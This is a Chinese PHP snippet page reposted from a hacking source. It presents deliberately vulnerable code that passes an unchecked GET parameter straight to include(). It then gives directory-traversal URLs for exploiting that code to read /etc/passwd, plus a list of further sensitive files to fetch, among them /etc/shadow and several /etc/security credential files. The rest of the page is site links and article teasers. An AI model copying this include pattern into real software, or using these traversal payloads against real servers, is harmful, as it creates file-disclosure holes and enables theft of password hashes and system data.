宜配屋

php 伪造本地文件包含漏洞的代码

yipeiwu_com6年前PHP代码库
代码:
复制代码 代码如下:

<?php
$page=$_GET['page'];
include($page.'php');
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach
返回列表

上一篇:Python字符转换

下一篇:PHP生成静态页面详解

相关文章

PHP单例模式数据库连接类与页面静态化实现方法

PHP单例模式数据库连接类与页面静态化实现方法

本文实例讲述了PHP单例模式数据库连接类与页面静态化实现方法。分享给大家供大家参考,具体如下: 数据库test中数据表account内容 单例模式的数据库连接类 db.php &l...

php实现插入数组但不影响原有顺序的方法

本文实例讲述了php实现插入数组但不影响原有顺序的方法。分享给大家供大家参考。具体实现方法如下: function array_intsort($array,$num) { $ar...

PHP 与 UTF-8 的最佳实践详细介绍

《PHP中的字符串、编码、UTF-8》一文中描述了一些列的基础知识,比较枯燥,现在来说点有用的——PHP 字符串处理的最佳实践,本文是“PHP、字符串、编码、UTF-8”相关知识的第二部...

PHP中的替代语法介绍

今天看了一下wordpress的代码,里面有些少见的php替代语法, 复制代码 代码如下: <?php else : ?>    ...

详解WordPress中的头像缓存和代理中的缓存更新方法

详解WordPress中的头像缓存和代理中的缓存更新方法

wordpress评论中的头像是使用Gravatar的头像服务(Gravatar官方注册地址:http://en.gravatar.com),用户的缓存头像一般都是固定不变的,所以我们可...

© YiPeiWu.com 【宜配屋】 粤ICP备17031333号

Powered By Z-BlogPHP. Theme by TOYEAN.